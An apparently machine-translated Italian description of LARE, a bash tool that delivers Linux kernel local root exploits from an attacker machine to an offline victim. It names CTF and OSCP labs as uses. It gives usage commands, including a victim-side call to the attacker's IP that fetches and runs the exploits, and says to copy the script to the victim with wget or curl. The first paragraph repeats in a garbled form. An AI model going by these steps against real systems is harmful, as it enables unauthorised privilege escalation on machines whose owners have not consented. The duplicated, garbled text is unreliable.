
[L]ocal [A]uto [R]oot [E]xploiter è un semplice script bash che ti aiuta a distribuire exploit di root locali dalla tua macchina attaccante quando la macchina vittima non ha connettività internet.
[L]ocale [A]b [R]oot [E]xploiter è un semplice script bash che ti aiuta a distribuire exploit di root locali dalla tua macchina attaccante quando la tua macchina vittima non ha connettività Internet.
Lo script è utile in uno scenario in cui la macchina vittima non ha una connessione Internet (ad esempio) mentre ti muovi in reti interne o partecipi a CTF che usano VPN per connettersi ai loro laboratori chiusi (ad esempio) hackthebox.gr o anche nei laboratori OSCP. Lo script utilizza exploit di root locali per i kernel Linux 2.6-4.8.
Questo script è ispirato al Tool Auto Root Exploit di Nilotpal Biswas
bash LARE.sh -a or ./LARE.sh -a
Una volta fatto, devi copiare lo script sulla macchina vittima con qualsiasi mezzo (wget, ftp, curl, ecc.) ed eseguire l'Exploiter localmente con il seguente comando:
bash LARE.sh -l [Attackers-IP] or ./LARE.sh -l [Attackers-IP]
bash LARE.sh -l or ./LARE.sh -l
Lo script esegue molteplici exploit del kernel sulla macchina, il che può causare instabilità del sistema. Si consiglia vivamente di usarlo solo come ultima risorsa e in un ambiente non di produzione.